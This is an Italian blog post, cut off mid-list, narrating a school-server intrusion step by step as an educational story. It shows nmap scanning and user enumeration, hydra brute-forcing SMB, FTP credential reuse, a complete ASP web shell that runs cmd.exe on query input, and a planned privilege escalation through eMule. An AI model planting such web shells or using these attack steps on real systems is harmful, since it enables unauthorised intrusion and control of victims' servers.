{"id":238,"date":"2024-03-03T13:56:00","date_gmt":"2024-03-03T13:56:00","guid":{"rendered":"https:\/\/www.cyberdoomera.com\/?p=238"},"modified":"2024-03-03T14:06:23","modified_gmt":"2024-03-03T14:06:23","slug":"ghost-in-the-network-a-real-hacking-story-2","status":"publish","type":"post","link":"https:\/\/www.cyberdoomera.com\/en\/2024\/03\/03\/ghost-in-the-network-a-real-hacking-story-2\/","title":{"rendered":"Ghost in the network &#8211; A real hacking story"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/hacker-1725256_1280-1024x682.jpg\" alt=\"\" class=\"wp-image-305\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/hacker-1725256_1280-1024x682.jpg 1024w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/hacker-1725256_1280-300x200.jpg 300w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/hacker-1725256_1280-768x512.jpg 768w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/hacker-1725256_1280.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Prima di iniziare a scrivere questo post \u00e8 doveroso fare qualche premessa:<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\"><strong>Il racconto \u00e8 &#8220;ispirato&#8221; ad una storia vera<\/strong>: l&#8217;articolo riguarder\u00e0 un fatto realmente accaduto, non si parler\u00e0 di una tipologia di attacco specifica;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Lo scopo del racconto \u00e8 puramente educativo: <\/strong>sembra superfluo ricordare che entrare abusivamente in un sistema informatico senza aver prima ricevuto l&#8217;esplicito consenso del suo proprietario \u00e8 illegale. Il caso in questione serve pertanto solo a dimostrare quanto possa essere pericoloso e relativamente facile per un aggressore ottenere poteri &#8220;illimitati&#8221; partendo anche da un semplice accesso.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Background ed environment<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Questa storia \u00e8 ambientata nell&#8217;Irlanda dei primi anni 2000, il nostro protagonista <strong>Natan-k<\/strong> \u00e8 uno studente adolescente. Come molti ragazzi, anche Natan ha qualche &#8220;problemino&#8221; con i suoi professori ed in generale con le autorit\u00e0, nel contempo per\u00f2 ha dalla sua curiosit\u00e0 e una spiccata propensione per la tecnologia. Tornato a casa dopo un&#8217;ennesima lite furiosa con i professori, dopo esser stato nuovamente punito e sospeso, <strong>Natan-k<\/strong> decide di vendicarsi attaccando il server della propria scuola. Inutile dire che molti degli attacchi che riporteremo nell&#8217;articolo non sono pi\u00f9 attuabili se non in ambienti prettamente virtualizzati; questo perch\u00e8, fortunatamente i sistemi sono molto pi\u00f9 sicuri e la protezione dei dati ha assunto una diversa centralit\u00e0 nel mondo di oggi, ma nonostante queste doverose premesse, si pu\u00f2 comunque affermare che il mindset e la filosofia che risiede dietro gli attacchi e la difesa \u00e8 rimasta inviariata. Vedremo pertanto come sia possibile apprendere molto anche da un attacco eseguito pi\u00f9 di 20 anni fa<\/p>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Hacking Phases<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Quando ci si trova a dover attaccare un sistema si eseguono una serie di attivit\u00e0 in un ordine ben specifico. Queste &#8220;fasi&#8221; ed il relativo ordine in cui le si esegue non sono cambiate negli anni e si possono riassumere nelle seguenti:<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\"><strong>Reconnaissance<\/strong> <strong>(raccolta delle informazioni)<\/strong>: si raccolgono quante pi\u00f9 informazioni possibili riguardo il bersaglio come i servizi attivi, le porte associate a tali servizi, gli utenti presenti sul sistema e altre informazioni riguardanti la rete e la relativa mappatura;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Scanning (ricerca delle vulnerabilit\u00e0): <\/strong>in quest fase si cerca di trovare le vulnerabilit\u00e0 presenti sui servizi, nella rete e in generale in tutti i layer della struttura;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Exploit (sfruttamento delle vulnerabilit\u00e0):<\/strong> una volta individuate le vulnerabilit\u00e0, si cerca di sfruttarle per ottenere un primo accesso al sistema;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Privilege escalation (aumento del livello di accesso):<\/strong> si sfruttano delle vulnerabilit\u00e0 per aumentare il proprio livello di accesso all&#8217;interno del sistema che si \u00e8 appena compromesso. La necessit\u00e0 di ricorrere al PE \u00e8 relativa al livello di accesso ottenuto in fase di exploit e soprattutto agli obiettivi dell&#8217;attaccante. Spesso infatti non \u00e8 necessario ottenere i poteri dell&#8217;utente root per poter raggiungere i propri scopi, specialmente se questi si esauriscono nell&#8217;exfiltrazione di dati specifici dell&#8217;utente;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Persistence (mantenimento dell&#8217;accesso):<\/strong> In questa importante fase si utilizzano delle backdoor per assicurarsi di poter riaccedere in futuro al sistema in maniera pi\u00f9 semplice e soprattutto in modo &#8220;meno rumoroso&#8221;. Questo step \u00e8 in assoluto uno dei pi\u00f9 importanti e dei pi\u00f9 sottovalutati. Se non si garantisce la persistenza esister\u00e0 sempre il rischio di perdere l&#8217;accesso ottenuto tramite sfruttamento delle vulnerabilit\u00e0 a seguito per esempio di applicazioni di patch applicative o pi\u00f9 semplicemente di un cambio password di un utente compromesso;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Exfiltration (estrapolazione dei dati):<\/strong> si utilizzano software e tecniche per poter estrapolare i dati privati degli utenti e del sistema; quest&#8217;ultimo \u00e8 solitamente il vero obiettivo di un attaccante. L&#8217;exfiltration ha un duplice effetto: il primo \u00e8 ovviamente la compromissione diretta dei dati privati e della privacy degli utenti, il secondo invece (spesso meno considerato ma altrettanto pericoloso) \u00e8 la <strong>compromissione di altri sistemi grazie ai dati acquisiti<\/strong>;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Lateral movement o pivoting (compromissione della rete interna):<\/strong> spesso, dopo aver ottentuo l&#8217;accesso ad un server pubblico \u00e8 possibile raggiungere le macchine della rete interna collegate ad esso. Tali macchine possono detenere dati sensibili ed informazioni critiche;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Cover track (pulizia delle informazioni di accesso):<\/strong> importante step in cui l&#8217;attaccante modifica i file di log per cancellare le tracce lasciate dall&#8217;attacco, rendendo cos\u00ec pi\u00f9 difficile risalire a lui.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:62px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Step 1 -\u2002Reconnaissance<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Ripercorriamo le stesse azioni eseguite da Natan-k partendo proprio dallo step numero 1 e lo facciamo\u2002avendo a disposizione le sue stesse informazioni, una sola in realt\u00e0: l&#8217;url del sito web della sua scuola. Prima di scomodare nmap ed altri tool per enumerazione dei servizi, la prima cosa da fare quando si attacca un sistema esterno di cui non si hanno informazioni \u00e8 utilizzare il servizio <strong>whois<\/strong>. Whois fornisce utilssime informazioni in merito al proprietario di un dominio ma, cosa pi\u00f9 importante, fornisce informazioni dettagliate sul range di indirizzi assegnato ad un particolare blocco di rete, permettendo cos\u00ec di concentrare i propri attacchi contro l&#8217;intera rete del sistema target. Ecco di seguito la tripletta iniziale per la raccolta di informazioni dall&#8217;esterno<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>ping www.natanfakeschool.ie<br>PING ext-natanfakeschool.com <strong>(192.168.178.63)<\/strong> 56(84) bytes of data.<br>64 bytes from 198.185.159.145 (192.168.173.63): icmp_seq=1 ttl=51 time=101 ms<br>64 bytes from 198.185.159.145 (192.168.173.63): icmp_seq=2 ttl=51 time=124 ms<br><\/code><\/pre>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">grazie al ping otteniamo  l&#8217;indirizzo ip della macchina, da riutilizzare immediatamente con il tool whois<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>otacon@ShadowMoses:~\/Desktop\/project\/natan-k$ whois 192.168.173.63<br><br>#<br># ARIN WHOIS data and services are subject to the Terms of Use<br># available at: https:\/\/www.arin.net\/resources\/registry\/whois\/tou\/<br>#<br># If you see inaccuracies in the results, please report at<br># https:\/\/www.arin.net\/resources\/registry\/whois\/inaccuracy_reporting\/<br>#<br># Copyright 1997-2024, American Registry for Internet Numbers, Ltd.<br>#<br><br><br><strong>NetRange:       192.168.173.0 - 192.168.173.255<\/strong><br>CIDR:           192.168.173.0\/24<br>NetName:        NATANFAKESCHOOL<br>NetHandle:      XXXXXXXXXXXXXXXXXXXXXXXXX<br>Parent:         XXXXXXXXXXXXXXXXXXXXXXXXX<br>NetType:        Direct Allocation<br>OriginAS:       XXXXXXXXXXXXXXXXXXXXXXXXX<br>Organization:   XXXXXXXXXXXXXXXXXXXXXXXXX<br>RegDate:        XXXXXXXXXXXXXXXXXXXXXXXXX<br>Updated:        XXXXXXXXXXXXXXXXXXXXXXXXX<br>Comment:        XXXXXXXXXXXXXXXXXXXXXXXXX<br>Ref:            XXXXXXXXXXXXXXXXXXXXXXXXX<br><br><\/code><\/pre>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">NetRange \u00e8 il parametro pi\u00f9 importante: ci comunica l&#8217;indirizzo iniziale e finale per quel blocco di rete. Quella della scuola di Natan-k \u00e8 una rete di classe C, questo significa che pu\u00f2 esporre al pubblico fino a 255 computer. Oggi sarebbe abbastanza inusuale trovare una rete di classe C pubblica per una semplice scuola ma nei primi 2000 queste situazioni erano un po&#8217; pi\u00f9 comuni.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Il terzo tool utilizzato in questa ultima fase di reconnaissance \u00e8 <strong>nmap<\/strong>. Nmap \u00e8 attualmente lo &#8220;standard de facto&#8221; in tema di port scanning e si pu\u00f2 dire che lo era anche 25 anni fa&#8230; questo la dice lunga sulla potenza di questo tool!<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Step 2 -\u2002Scanning<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Nmap \u00e8  utilizzato principalmente per eseguire il mapping di una rete, individuare le macchine attive ed i servizi esposti. Utilizzandolo contro il range della natanfakeschool il risultato \u00e8\u2002il seguente<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -sV --open 192.168.173.0-254<\/code><\/pre>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"392\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/nmap_scan-1024x392.jpg\" alt=\"\" class=\"wp-image-252\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/nmap_scan-1024x392.jpg 1024w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/nmap_scan-300x115.jpg 300w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/nmap_scan-768x294.jpg 768w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/nmap_scan.jpg 1446w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Anche ad un occhio poco esperto non sar\u00e0 sfuggito il fatto che il primo sistema, che \u00e8 quello del web server della scuola, \u00e8 anche il pi\u00f9 vulnerabile: presenta infatti una sfilza di servizi attivi esposti al pubblico. Al giorno d&#8217;oggi questo equivarrebbe ad un vero e proprio <strong>suicidio telematico<\/strong>. E&#8217; presente un http server di una versione obsoleta (IIS 5.0), un FTP server, ma \u00e8 l&#8217;esposizione del <strong>servizio Netbios e windows RPC<\/strong> a destare maggiore preoccupazione. Anche all&#8217;epoca esporre questi servizi in una rete pubblica costituiva una seria minaccia, ed infatti, come adesso vedremo, questo ha rappresentato il primo punto di accesso. All&#8217;epoca dei fatti era possibile enumerare gli utenti collegandosi da una sessione anonima al servizio Netbios, in poche parole non era necessario avere nessuna password per collegarsi al sistema e ottenere un elenco di username validi (spoiler: questa vulnerabilit\u00e0 \u00e8 stata patchata 20 anni fa).<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">User Enumeration <\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Per enumerare gli utenti richiamiamo nmap con il seguente comando di scripting<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap --script smb-enum-users 192.168.178.63<br><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/userenum-1024x428.jpg\" alt=\"\" class=\"wp-image-255\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/userenum-1024x428.jpg 1024w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/userenum-300x125.jpg 300w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/userenum-768x321.jpg 768w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/userenum.jpg 1374w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Sono presenti diversi username, alcuni afferenti ad utenti con privilegi di amministratore, altri come normali user. Una cosa che un attaccante potrebbe subito provare \u00e8 un semplice attacco bruteforce su password deboli, questo per ottenere almeno un accesso iniziale. Potremmo essere ancora pi\u00f9 fortuati e trovare cos\u00ec degli account che hanno password uguale all&#8217;username, sembra folle ma \u00e8 una cosa che capita pi\u00f9 spesso di quanto possiate immaginare.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">First access &#8211; netbios cracking<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Useremo il tool hydra proprio per provare ad utilizzare questa modalit\u00e0 di accesso<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>#Utilizziamo lo stesso file per username e password<br>hydra -L users.txt -P users.txt -u smb:\/\/192.168.178.63<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"212\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/crack_netbios-1024x212.jpg\" alt=\"\" class=\"wp-image-266\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/crack_netbios-1024x212.jpg 1024w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/crack_netbios-300x62.jpg 300w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/crack_netbios-768x159.jpg 768w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/02\/crack_netbios.jpg 1139w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">In questo semplice modo, Natan-k riusc\u00ec ad ottenere un accesso iniziale al sistema. L&#8217;utente <strong>mclevis<\/strong> \u00e8 un account user normale non appartenente al gruppo <strong>administrators<\/strong>. In assenza di condivisioni disco e con un utente non amministratore, il numero di cose da poter fare con queste informazioni sono assai limitate.<\/p>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Step 3 -\u2002Exploit<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Natan-k non \u00e8 per\u00f2 tipo da arrendersi cos\u00ec facilmente, in mano aveva un account valido e tanti altri servizi da sfruttare per ottenere i suoi scopi.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">FTP Cracking &#8211; Credential Stuffing<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Nella scansione iniziale effettuate con nmap, alla maggior parte dei lettori non sar\u00e0 sfuggito il fatto che nella lista dei servizi attivi \u00e8 presente anche FTP. FTP \u00e8 un servizio ancora oggi utilizzato per lo scambio di file attraverso la rete. Nel caso di server web, FTP veniva ampiamente utilizzato per l&#8217;amministrazione remota di un sito, in quanto uno sviluppatore poteva caricare direttamente le pagine html attraverso questo servizio. Per accedere \u00e8 necessario comunque fornire username e password.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Per <strong>credential stuffing<\/strong> si intende il riutilizzo di credenziali compromesse contro altri sistemi. Spesso infatti per ragioni pratiche o addirittura sistemistiche, si tende a riutilizzare le stesse credenziali su diversi sistemi o servizi. Windows 2000 infatti utilizza di default le credenziali di sistema per gestire anche FTP. Arriv\u00f2 cos\u00ec il momento di tentare il credential stuffing dell&#8217;utente mclevis contro il servizio FTP<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"755\" height=\"721\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/ftp_Access.jpg\" alt=\"\" class=\"wp-image-269\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/ftp_Access.jpg 755w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/ftp_Access-300x286.jpg 300w\" sizes=\"auto, (max-width: 755px) 100vw, 755px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Con somma gioia Natan ottenne una prima vera vittoria: un accesso in scrittura sulla directory del sito web della sua scuola. Gi\u00e0 con questo livello di accesso \u00e8 possibile modificare e deturpare a piacimento un sito, quanto basta per mettere in ridicolo gli amministratori. Natan non era per\u00f2 guidato da spirito distruttivo, quello che voleva davvero era la conoscenza e soprattutto vedere fin dove fosse possibile arrivare. L&#8217;utente normale non bastava pi\u00f9, era arrivato il momento di diventare Amministratori.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Step 4 -\u2002Privilege escalation<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Un utente normale con un semplice accesso al sito web rappresenta gi\u00e0 una grave minaccia per il sistema, ma cosa accadrebbe se si dovesse ottenere l&#8217;accesso come amministratore? In questo caso si avrebbe il totale controllo sul sistema e sugli altri utenti. E&#8217; necessario rimanere silenzioni e lavorare di astuzia e pazienza per ottenere tale risultato.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Web shell &#8211; backdooring <\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Il primo passo per iniziare ad esplorare il sistema \u00e8 ottenere una <strong>shell<\/strong>. Questo obiettivo \u00e8 facilmente ottenibile quando si compromette un sito web e lo si fa impiantanto una web shell che funge da backdoor. Di seguito un codice asp per una web shell minimale<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code><%<br>Dim objShell<br>Set objShell = Server.CreateObject(\"WScript.Shell\")<br><br>Dim userInput<br>userInput = Request.QueryString(\"input\")<br><br>Dim outputFileName<br>outputFileName = \"c:\\inetpub\\wwwroot\\output.txt\"<br><br>objShell.Run \"cmd.exe \/c \" & userInput & \" > \"\"\" & outputFileName & \"\"\"\", 0, True<br><br>Dim fso, outputFile, outputContent<br>Set fso = Server.CreateObject(\"Scripting.FileSystemObject\")<br>Set outputFile = fso.OpenTextFile(outputFileName, 1)<br>outputContent = outputFile.ReadAll()<br>outputFile.Close()<br><br>Set outputFile = Nothing<br><br>Response.Write(\"<pre>\" & outputContent & \"<\/pre>\")<br>fso.DeleteFile outputFileName<br><br>Set objShell = Nothing<br>%><br><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">E&#8217; possibile utilizzare la webshell eseguendo comandi nel seguente modo <strong>http:\/\/192.168.178.63\/webshell1.asp?input=dir%20c:\\<\/strong><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"692\" height=\"378\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/shelldir-1.jpg\" alt=\"\" class=\"wp-image-278\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/shelldir-1.jpg 692w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/shelldir-1-300x164.jpg 300w\" sizes=\"auto, (max-width: 692px) 100vw, 692px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Natan non riusc\u00ec a sfruttare nessuna vulnerabilit\u00e0 per ottenere un privilege escalation e impieg\u00f2 diverso tempo per trovare un modo alternativo al fine di ottenere l&#8217;accesso come Administrator. Sul punto di arrendersi Natan not\u00f2 per\u00f2 la presenza di un particolare software su un disco secondario<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Emule Backdooring<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Su un disco secondario mappato sul drive E: Natan trov\u00f2 qualcosa di molto interessante<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"422\" height=\"305\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/emule.jpg\" alt=\"\" class=\"wp-image-280\" style=\"width:521px;height:auto\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/emule.jpg 422w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/emule-300x217.jpg 300w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Emule \u00e8 un software per lo scambio file tramite peer to peer, incredibilmente il webserver veniva utilizzato dall&#8217;amministratore per scopi personali, questo proprio per sfruttare la connessione permanente del server (all&#8217;epoca le adsl non erano ancora cos\u00ec diffuse). Questa &#8220;distrazione&#8221;, come vedremo, permise a Natan di ottenere l&#8217;agognato accesso come administrator. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Si assicur\u00f2 di due cose fondamentali<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\">La directory di emule risultava scrivibile da normale utente <\/li>\n\n\n\n<li style=\"font-size:18px\">emule veniva eseguito costantemente da un utente con privilegi di amministratore<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">A Natan bast\u00f2 creare un programma in grado di<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\">Creare un utente<\/li>\n\n\n\n<li style=\"font-size:18px\">Aggiungerlo al gruppo administrators<\/li>\n\n\n\n<li 